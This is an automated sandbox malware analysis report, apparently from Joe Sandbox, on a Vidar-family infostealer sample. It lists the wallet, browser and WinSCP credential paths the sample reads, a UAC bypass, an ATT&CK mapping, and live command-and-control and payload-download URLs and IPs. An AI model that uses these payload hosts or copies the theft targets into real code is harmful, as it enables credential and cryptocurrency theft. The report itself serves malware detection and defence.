                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_00430FB7
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeQueries volume information: C:\Users\user\Desktop\yaALNupJCH.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC2CED cpuid 0_2_00CC2CED
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC2F2B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00CC2F2B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CCFC87 _free,_free,_free,GetTimeZoneInformation,_free,0_2_00CCFC87
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CBF340 Sleep,Sleep,IsUserAnAdmin,GetUserNameA,GetComputerNameExW,GetModuleFileNameA,0_2_00CBF340
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CB4210 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_00CB4210
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                                Source: Amcache.hve.6.drBinary or memory string: c:\users\user\desktop\procexp.exe
                                Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                                Source: yaALNupJCH.exe, 00000003.00000002.909148118.0000000002DAB000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.909197492.00000000038C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                Source: Amcache.hve.6.drBinary or memory string: procexp.exe

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: yaALNupJCH.exe, type: SAMPLE
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.yaALNupJCH.exe.cb0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.0.yaALNupJCH.exe.cb0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000000.875302819.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000002.907305691.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000000.882851946.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000003.00000000.886541366.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1025890323.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED
                                Source: Yara matchFile source: 3.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399625088.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, type: DROPPED
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\2_2_0040BA7E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: \key3.db2_2_0040BA7E
                                Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.00000000010AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                                Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\??*Xh
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.00000000010AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.00000000010AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                                Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\backups
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\??*Xh
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                                Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\backups
                                Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default_wallet
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.00000000010AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file__0.localstorage
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\??n=`
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                                Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\??Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_0040B960
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7536, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe, type: DROPPED
                                Source: Yara matchFile source: 3.2.yaALNupJCH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.yaALNupJCH.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1399625088.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7428, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: yaALNupJCH.exe PID: 7592, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, type: DROPPED
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: cmd.exe2_2_0040569A
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E1307A sqlite3_transfer_bindings,3_2_61E1307A
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D5E6 sqlite3_bind_int64,3_2_61E2D5E6
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D595 sqlite3_bind_double,3_2_61E2D595
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E0B431 sqlite3_clear_bindings,3_2_61E0B431
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E037F3 sqlite3_value_frombind,3_2_61E037F3
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D781 sqlite3_bind_zeroblob64,3_2_61E2D781
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D714 sqlite3_bind_zeroblob,3_2_61E2D714
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D68C sqlite3_bind_pointer,3_2_61E2D68C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D65B sqlite3_bind_null,3_2_61E2D65B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D635 sqlite3_bind_int,3_2_61E2D635
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D9B0 sqlite3_bind_value,3_2_61E2D9B0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D981 sqlite3_bind_text16,3_2_61E2D981
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D945 sqlite3_bind_text64,3_2_61E2D945
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D916 sqlite3_bind_text,3_2_61E2D916
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D8E7 sqlite3_bind_blob64,3_2_61E2D8E7
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E038CA sqlite3_bind_parameter_count,3_2_61E038CA
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E158CA sqlite3_bind_parameter_index,3_2_61E158CA
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E038DC sqlite3_bind_parameter_name,3_2_61E038DC
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61E2D8B8 sqlite3_bind_blob,3_2_61E2D8B8
                                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                                Valid Accounts1
                                Windows Management Instrumentation
                                1
                                Windows Service
                                1
                                Exploitation for Privilege Escalation
                                1
                                Deobfuscate/Decode Files or Information
                                2
                                OS Credential Dumping
                                2
                                System Time Discovery
                                Remote Services11
                                Archive Collected Data
                                Exfiltration Over Other Network Medium23
                                Ingress Tool Transfer
                                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                                System Shutdown/Reboot
                                Default Accounts1
                                Native API
                                Boot or Logon Initialization Scripts1
                                Bypass User Access Control
                                2
                                Obfuscated Files or Information
                                21
                                Input Capture
                                1
                                Account Discovery
                                Remote Desktop Protocol3
                                Data from Local System
                                Exfiltration Over Bluetooth21
                                Encrypted Channel
                                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization1
                                Defacement
                                Domain Accounts1
                                Command and Scripting Interpreter
                                Logon Script (Windows)1
                                Access Token Manipulation
                                1
                                Bypass User Access Control
                                1
                                Credentials in Registry
                                1
                                System Service Discovery
                                SMB/Windows Admin Shares1
                                Screen Capture
                                Automated Exfiltration11
                                Non-Standard Port
                                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                                Local Accounts2
                                Service Execution
                                Logon Script (Mac)1
                                Windows Service
                                1
                                Masquerading
                                2
                                Credentials In Files
                                4
                                File and Directory Discovery
                                Distributed Component Object Model21
                                Input Capture
                                Scheduled Transfer4
                                Non-Application Layer Protocol
                                SIM Card SwapCarrier Billing Fraud
                                Cloud AccountsCronNetwork Logon Script222
                                Process Injection
                                21
                                Virtualization/Sandbox Evasion
                                LSA Secrets55
                                System Information Discovery
                                SSH12
                                Clipboard Data
                                Data Transfer Size Limits125
                                Application Layer Protocol
                                Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                                Replication Through Removable MediaLaunchdRc.commonRc.common1
                                Access Token Manipulation
                                Cached Domain Credentials141
                                Security Software Discovery
                                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                                External Remote ServicesScheduled TaskStartup ItemsStartup Items222
                                Process Injection
                                DCSync21
                                Virtualization/Sandbox Evasion
                                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                                Rundll32
                                Proc Filesystem12
                                Process Discovery
                                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                                Application Window Discovery
                                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                                System Owner/User Discovery
                                Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                                Remote System Discovery
                                Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1315647 Sample: yaALNupJCH.exe Startdate: 28/09/2023 Architecture: WINDOWS Score: 100 31 mardukoff.info 2->31 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Found malware configuration 2->51 53 16 other signatures 2->53 8 yaALNupJCH.exe 20 2->8         started        signatures3 process4 dnsIp5 33 95.141.41.12, 49794, 49798, 49802 ASSEFLOWAmsterdamInternetExchangeAMS-IXIT Italy 8->33 35 mardukoff.info 127.0.0.127 unknown unknown 8->35 37 2 other IPs or domains 8->37 23 C:\Users\user\AppData\Local\...\svchost.dll, PE32 8->23 dropped 25 C:\Users\user\AppData\...\svchost[1].dll, PE32 8->25 dropped 27 C:\Users\user\AppData\...\svchost[1].exe, PE32 8->27 dropped 29 C:\Users\user\AppData\Local\...\host[1].exe, PE32 8->29 dropped 55 Contains functionality to bypass UAC (CMSTPLUA) 8->55 57 Contains functionalty to change the wallpaper 8->57 59 Found many strings related to Crypto-Wallets (likely being stolen) 8->59 61 6 other signatures 8->61 13 yaALNupJCH.exe 18 8->13         started        17 yaALNupJCH.exe 3 13 8->17         started        19 rundll32.exe 8->19         started        file6 signatures7 process8 dnsIp9 39 t.me 149.154.167.99, 443, 49808 TELEGRAMRU United Kingdom 13->39 41 116.202.2.169, 1333, 49810 HETZNER-ASDE Germany 13->41 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->63 65 Found many strings related to Crypto-Wallets (likely being stolen) 13->65 67 Tries to harvest and steal browser information (history, passwords, etc) 13->67 69 Tries to steal Crypto Currency Wallets 13->69 21 WerFault.exe 21 9 13->21         started        43 81.19.131.36, 2450, 49801 IVC-ASRU Russian Federation 17->43 45 geoplugin.net 178.237.33.50, 49805, 80 ATOM86-ASATOM86NL Netherlands 17->45 signatures10 process11

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                yaALNupJCH.exe76%ReversingLabsWin32.Spyware.Vidar
                                yaALNupJCH.exe74%VirustotalBrowse
                                yaALNupJCH.exe100%AviraTR/Redcap.imosn
                                yaALNupJCH.exe100%Joe Sandbox ML
                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe100%AviraTR/AD.GenSteal.aekjv
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe100%AviraBDS/Backdoor.Gen
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exe63%ReversingLabsWin32.Spyware.Vidar
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dll52%ReversingLabsWin32.Spyware.Vidar
                                C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll52%ReversingLabsWin32.Spyware.Vidar
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                transdi.org7%VirustotalBrowse
                                geoplugin.net1%VirustotalBrowse
                                SourceDetectionScannerLabelLink
                                http://95.141.41.12/n9kd3X/index.php90%Avira URL Cloudsafe
                                http://geoplugin.net/json.gpp80%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpE0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpespace0%Avira URL Cloudsafe
                                http://116.202.2.169:1333/temp.zip0%Avira URL Cloudsafe
                                http://transdi.org/host.exe3jd/index.php0c100%Avira URL Cloudmalware
                                http://pixcode.com.mx/svchost.exexg0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.php90%VirustotalBrowse
                                http://116.202.2.169:1333/temp.zip0%VirustotalBrowse
                                http://116.202.2.169:1333/t0%Avira URL Cloudsafe
                                http://pixcode.com.mx/svchost.exeV0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpNq0%Avira URL Cloudsafe
                                http://transdi.org/host.exeZ100%Avira URL Cloudmalware
                                http://geoplugin.net/json.gp/C0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpspace0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpk0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpodq0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.php(0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpatch0%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.php10%Avira URL Cloudsafe
                                http://95.141.41.12/n9kd3X/index.phpspace0%VirustotalBrowse
                                http://95.141.41.12/n9kd3X/index.phpRs0%Avira URL Cloudsafe
                                http://geoplugin.net/json.gpon0%Avira URL Cloudsafe
                                http://geoplugin.net/json.gp/C0%VirustotalBrowse
                                http://95.141.41.12/n9kd3X/index.phpv0%Avira URL Cloudsafe
                                http://mardukoff.info/g9ecOb3jd/index.phpdq0%Avira URL Cloudsafe
                                http://pixcode.com.mx/svchost.exeat0%Avira URL Cloudsafe
                                http://pixcode.com.mx/svchost.exerd0%Avira URL Cloudsafe
                                http://transdi.org/host.exe8100%Avira URL Cloudmalware
                                http://transdi.org/host.exe5100%Avira URL Cloudmalware
                                http://95.141.41.12/n9kd3X/index.phpU0%Avira URL Cloudsafe
